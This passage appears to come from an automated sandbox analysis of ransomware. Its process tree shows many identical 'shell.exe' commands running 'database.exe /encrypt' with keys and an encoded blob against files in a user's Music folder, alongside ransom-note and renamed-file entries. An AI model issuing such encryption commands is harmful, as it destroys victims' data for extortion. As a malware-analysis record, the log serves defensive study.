                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\InvokeOpen.potx.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4764
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\JoinRegister.wmf.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\LimitApprove.eps.sage.gif"
  5⤵
    PID:6612
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\LimitApprove.mhtml.sage.gif"
  5⤵
    PID:6800
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\LimitPing.otf.sage.gif"
  5⤵
  • System Network Configuration Discovery: Internet Connection Discovery
    PID:1116
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\MeasureLock.gif.sage.gif"
  5⤵
    PID:4284
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\MergeSkip.mov.sage.gif"
  5⤵
    PID:3060
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\NewWrite.tif.sage.gif"
  5⤵
    PID:4956
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\README_sTlLoTpq.hta.gif"
  5⤵
    PID:4312
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\ReceiveDebug.potm.sage.gif"
  5⤵
    PID:4456
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\RegisterSync.mpg.sage.gif"
  5⤵
    PID:3604
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\RemoveDismount.i64.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\ResetDebug.iso.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\ResetSkip.mov.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\ResolveMerge.search-ms.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\ResumeUpdate.rle.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\SendCompress.ppsm.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\StopMeasure.xlsb.sage.gif"
  5⤵
    PID:4304
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\SuspendLimit.temp.sage.gif"
  5⤵
    PID:5940
• C:\Windows\SysWOW64\shell.exe
  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\SuspendSelect.cab.sage.gif"
  5⤵
    PID:1116
• C:\Windows\SysWOW64\shell.exe
